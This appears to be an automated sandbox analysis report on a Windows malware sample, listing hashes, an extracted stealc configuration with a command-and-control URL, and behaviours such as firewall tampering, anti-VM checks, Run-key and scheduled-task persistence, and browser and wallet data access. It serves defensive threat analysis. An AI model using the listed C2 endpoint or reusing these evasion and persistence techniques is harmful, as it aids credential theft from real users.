Analysis
max time kernel: 150s
max time network: 148s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 28-03-2024 02:19
Static task: static1
Behavioral task: behavioral1
Sample: 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe
Resource: win7-20240221-en

General
Target: 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe
Size: 4.1MB
MD5: 8803d74d52bcda67e9b889bd6cc5823e
SHA1: 884a1fa1ae3d53bc435d34f912c0068e789a8b25
SHA256: 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3
SHA512: c190ca373875789477a755f6246565bc7cb5744f1d5f62037e71d3595c1023f587f34a2437d9691ad96cde789026b7c2896110935e58cc2f1498cfea5d0d9564
SSDEEP: 49152:EIWoXiQpx+/9NQXrglcx9LUSf5AKbq7uFIT8AZPvKcNhNpHrlyI:Qo3gMmWoWRbWBvjNhbByI
Malware Config
Extracted: stealc
http://185.172.128.209
url_path: /3cd2b41cbde8fc9c.php
Signatures
Glupteba payload 15 IoCs
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | UeBGJdQZVUuurvvrtFOtjUqE.exe
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
  description | pid | Process | procid_target
  PID 1108 created 2600 | 1108 | RegAsm.exe | 45
Detect binaries embedding considerable number of MFA browser extension IDs. 3 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/3636-414-0x0000000000400000-0x000000000063B000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs
  behavioral2/memory/3636-502-0x0000000000400000-0x000000000063B000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs
  behavioral2/memory/3636-715-0x0000000000400000-0x000000000063B000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_Embedded_MFA_Browser_Extension_IDs
Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs. 3 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/3636-414-0x0000000000400000-0x000000000063B000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs
  behavioral2/memory/3636-502-0x0000000000400000-0x000000000063B000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs
  behavioral2/memory/3636-715-0x0000000000400000-0x000000000063B000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_Embedded_Crypto_Wallet_Browser_Extension_IDs
Detects Windows executables referencing non-Windows User-Agents 13 IoCs
Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 3 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/3636-414-0x0000000000400000-0x000000000063B000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_References_Browsers
  behavioral2/memory/3636-502-0x0000000000400000-0x000000000063B000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_References_Browsers
  behavioral2/memory/3636-715-0x0000000000400000-0x000000000063B000-memory.dmp | INDICATOR_SUSPICIOUS_Binary_References_Browsers
Detects executables (downloaders) containing URLs to raw contents of a paste 1 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/1472-0-0x0000000000400000-0x0000000000408000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_RawPaste_URL
Detects executables containing a Discord URL observed in first stage droppers 13 IoCs
Detects executables containing URLs to raw contents of a Github gist 13 IoCs
Detects executables containing artifacts associated with disabling Windows Defender 13 IoCs
Detects executables packed with Themida 11 IoCs
Detects executables referencing many varying, potentially fake Windows User-Agents 13 IoCs
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | UeBGJdQZVUuurvvrtFOtjUqE.exe
UPX dump on OEP (original entry point) 4 IoCs
Processes:
  resource | yara_rule
  behavioral2/files/0x0009000000023238-177.dat | UPX
  behavioral2/files/0x0009000000023238-172.dat | UPX
  behavioral2/memory/4940-187-0x0000000000400000-0x0000000000930000-memory.dmp | UPX
  behavioral2/memory/4940-448-0x0000000000400000-0x0000000000930000-memory.dmp | UPX
Blocklisted process makes network request 1 IoCs
Processes:
  flow | pid | Process
  190 | 5280 | rundll32.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
  pid | Process
  5608 | netsh.exe
  5640 | netsh.exe
  5220 | netsh.exe
Checks BIOS information in registry 2 TTPs 5 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | UeBGJdQZVUuurvvrtFOtjUqE.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | UeBGJdQZVUuurvvrtFOtjUqE.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | GJJottccSrZvHDi2rOc2biM9.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | Install.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | u2dw.0.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | Install.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | CAFIJKFHIJ.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | KQwfUoo.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | 2sK9qcVeMtm0aymJpbObEY9P.exe
Drops startup file 11 IoCs
Processes:
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OGw3iVRtVTorDTvrZWVFIRH3.bat | installutil.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SrW2mPdLSg31OAH841w73qcw.bat | installutil.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pm05pTLuUdC7FMJ85g9crRy7.bat | installutil.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jFDWS62MuE8dcLg86cb2VlF5.bat | installutil.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wj1sBVa2SKVzIVUuIxyRFx1k.bat | installutil.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ym0cIneygugXMnSzap6duAZS.bat | installutil.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GBvKxHnoVQeTRn9daTavP9xw.bat | installutil.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ycX4zOch6JksPqX8gcvOQIqE.bat | installutil.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VAyBqnC6d2btBn1GERznlHjO.bat | installutil.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1Jj9NBgyCRfcZudsJjLMwpnm.bat | installutil.exe
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xecqa4DAy7lCYCKQpjOuHDrT.bat | installutil.exe
Executes dropped EXE 33 IoCs
Processes:
  pid | Process
  3092 | GJJottccSrZvHDi2rOc2biM9.exe
  2244 | O0CPJ0FFbJ7m6QGvaPcCCRWK.exe
  3548 | 1W7hBQbCXjFNhD9IQsfTupEb.exe
  3180 | xS3VUm3AkBIOCvlKG8AJkD7Z.exe
  3700 | GUfrwuhZbYaOvK64ZU92F4kb.exe
  3636 | u2dw.0.exe
  4940 | u2dw.1.exe
  856 | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  1904 | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  2560 | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  2024 | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  1108 | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  212 | yuVVFMVY94h4dq6orGkzD9rD.exe
  3436 | Install.exe
  2636 | UeBGJdQZVUuurvvrtFOtjUqE.exe
  4136 | Install.exe
  4656 | GUfrwuhZbYaOvK64ZU92F4kb.exe
  4452 | 1W7hBQbCXjFNhD9IQsfTupEb.exe
  2224 | xS3VUm3AkBIOCvlKG8AJkD7Z.exe
  5956 | aqscNlEwGraum9ul3o4DymK7.exe
  5156 | Install.exe
  1276 | Install.exe
  5308 | Assistant_108.0.5067.20_Setup.exe_sfx.exe
  4504 | assistant_installer.exe
  4620 | assistant_installer.exe
  4028 | CAFIJKFHIJ.exe
  6108 | csrss.exe
  6032 | 2sK9qcVeMtm0aymJpbObEY9P.exe
  5144 | injector.exe
  5456 | windefender.exe
  4432 | windefender.exe
  2452 | puXYKqB.exe
  6056 | KQwfUoo.exe
Loads dropped DLL 12 IoCs
Processes:
  pid | Process
  856 | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  1904 | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  2560 | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  2024 | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  1108 | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  3636 | u2dw.0.exe
  3636 | u2dw.0.exe
  4504 | assistant_installer.exe
  4504 | assistant_installer.exe
  4620 | assistant_installer.exe
  4620 | assistant_installer.exe
  5280 | rundll32.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes:
  resource | yara_rule
  behavioral2/files/0x0009000000023238-177.dat | upx
  behavioral2/files/0x0009000000023238-172.dat | upx
  behavioral2/memory/4940-187-0x0000000000400000-0x0000000000930000-memory.dmp | upx
  behavioral2/memory/4940-448-0x0000000000400000-0x0000000000930000-memory.dmp | upx
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | xS3VUm3AkBIOCvlKG8AJkD7Z.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | GUfrwuhZbYaOvK64ZU92F4kb.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | 1W7hBQbCXjFNhD9IQsfTupEb.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | csrss.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Processes:
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | UeBGJdQZVUuurvvrtFOtjUqE.exe
Drops Chrome extension 2 IoCs
Processes:
  description | ioc | Process
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | KQwfUoo.exe
  File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | KQwfUoo.exe
Drops desktop.ini file(s) 1 IoCs
Processes:
  description | ioc | Process
  File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | KQwfUoo.exe
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description | ioc | Process
  File opened (read-only) | \??\D: | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  File opened (read-only) | \??\F: | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  File opened (read-only) | \??\D: | WZ5cX3pyFhvxZFq1AmkufeHv.exe
  File opened (read-only) | \??\F: | WZ5cX3pyFhvxZFq1AmkufeHv.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  77 | api.myip.com
  82 | ipinfo.io
Manipulates WinMonFS driver. 1 IoCs
Rootkits write to WinMonFS to hide directories/files from being detected.
Processes:
  description | ioc | Process
  File opened for modification | \??\WinMonFS | csrss.exe
Drops file in System32 directory 46 IoCs
Processes:
  description | ioc | Process
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | KQwfUoo.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E | KQwfUoo.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | puXYKqB.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | KQwfUoo.exe
  File opened for modification | C:\Windows\System32\GroupPolicy | UeBGJdQZVUuurvvrtFOtjUqE.exe
  File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | UeBGJdQZVUuurvvrtFOtjUqE.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 | KQwfUoo.exe
  File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | UeBGJdQZVUuurvvrtFOtjUqE.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | KQwfUoo.exe
  File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | UeBGJdQZVUuurvvrtFOtjUqE.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | powershell.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 | KQwfUoo.exe
  File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | puXYKqB.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | KQwfUoo.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | KQwfUoo.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
UeBGJdQZVUuurvvrtFOtjUqE.exe2sK9qcVeMtm0aymJpbObEY9P.exepid Process 2636 UeBGJdQZVUuurvvrtFOtjUqE.exe 6032 2sK9qcVeMtm0aymJpbObEY9P.exe 6032 2sK9qcVeMtm0aymJpbObEY9P.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exeO0CPJ0FFbJ7m6QGvaPcCCRWK.exedescription pid Process procid_target PID 3300 set thread context of 1472 3300 627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe 85 PID 2244 set thread context of 1108 2244 O0CPJ0FFbJ7m6QGvaPcCCRWK.exe 120 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
xS3VUm3AkBIOCvlKG8AJkD7Z.exe1W7hBQbCXjFNhD9IQsfTupEb.exeGUfrwuhZbYaOvK64ZU92F4kb.exedescription ioc Process File opened (read-only) \??\VBoxMiniRdrDN xS3VUm3AkBIOCvlKG8AJkD7Z.exe File opened (read-only) \??\VBoxMiniRdrDN 1W7hBQbCXjFNhD9IQsfTupEb.exe File opened (read-only) \??\VBoxMiniRdrDN GUfrwuhZbYaOvK64ZU92F4kb.exe -
Drops file in Program Files directory 14 IoCs
Processes:
KQwfUoo.exedescription ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi KQwfUoo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja KQwfUoo.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\EXgRWGG.dll KQwfUoo.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\ArGlQVg.xml KQwfUoo.exe File created C:\Program Files (x86)\yvWovCiVU\TRDYCX.dll KQwfUoo.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi KQwfUoo.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak KQwfUoo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak KQwfUoo.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\QWFyiZq.dll KQwfUoo.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\uLcyUgC.xml KQwfUoo.exe File created C:\Program Files (x86)\yvWovCiVU\ABWjUqu.xml KQwfUoo.exe File created C:\Program Files (x86)\LCifMpYymZWU2\HTMRMDKYbCyXN.dll KQwfUoo.exe File created C:\Program Files (x86)\LCifMpYymZWU2\kWMHQKZ.xml KQwfUoo.exe File created C:\Program Files (x86)\gbPxNkbXHfUn\lsTuwPS.dll KQwfUoo.exe -
Drops file in Windows directory 13 IoCs
Processes:
1W7hBQbCXjFNhD9IQsfTupEb.exeschtasks.exeschtasks.execsrss.exeschtasks.exeschtasks.exexS3VUm3AkBIOCvlKG8AJkD7Z.exeGUfrwuhZbYaOvK64ZU92F4kb.exeschtasks.exedescription ioc Process File opened for modification C:\Windows\rss 1W7hBQbCXjFNhD9IQsfTupEb.exe File created C:\Windows\rss\csrss.exe 1W7hBQbCXjFNhD9IQsfTupEb.exe File created C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job schtasks.exe File created C:\Windows\Tasks\FTXCzbcEvROqagNdd.job schtasks.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job schtasks.exe File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job schtasks.exe File opened for modification C:\Windows\rss xS3VUm3AkBIOCvlKG8AJkD7Z.exe File opened for modification C:\Windows\rss GUfrwuhZbYaOvK64ZU92F4kb.exe File created C:\Windows\rss\csrss.exe GUfrwuhZbYaOvK64ZU92F4kb.exe File created C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job schtasks.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\rss\csrss.exe xS3VUm3AkBIOCvlKG8AJkD7Z.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
sc.exepid Process 5920 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 2516 2244 WerFault.exe 87 2032 1108 WerFault.exe 90 2200 3092 WerFault.exe 86 2664 1108 WerFault.exe 90 5700 3636 WerFault.exe 97 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u2dw.0.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u2dw.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u2dw.0.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 5232 schtasks.exe 6068 schtasks.exe 5616 schtasks.exe 876 schtasks.exe 1344 schtasks.exe 3488 schtasks.exe 5544 schtasks.exe 5440 schtasks.exe 4444 schtasks.exe 4516 schtasks.exe 2208 schtasks.exe 3176 schtasks.exe 3168 schtasks.exe 4872 schtasks.exe 5932 schtasks.exe 5368 schtasks.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
rundll32.exeInstall.exeInstall.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
xS3VUm3AkBIOCvlKG8AJkD7Z.exepowershell.exepowershell.exepowershell.exepowershell.exewindefender.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeKQwfUoo.exepowershell.exedescription ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" xS3VUm3AkBIOCvlKG8AJkD7Z.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-571 = "China Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya 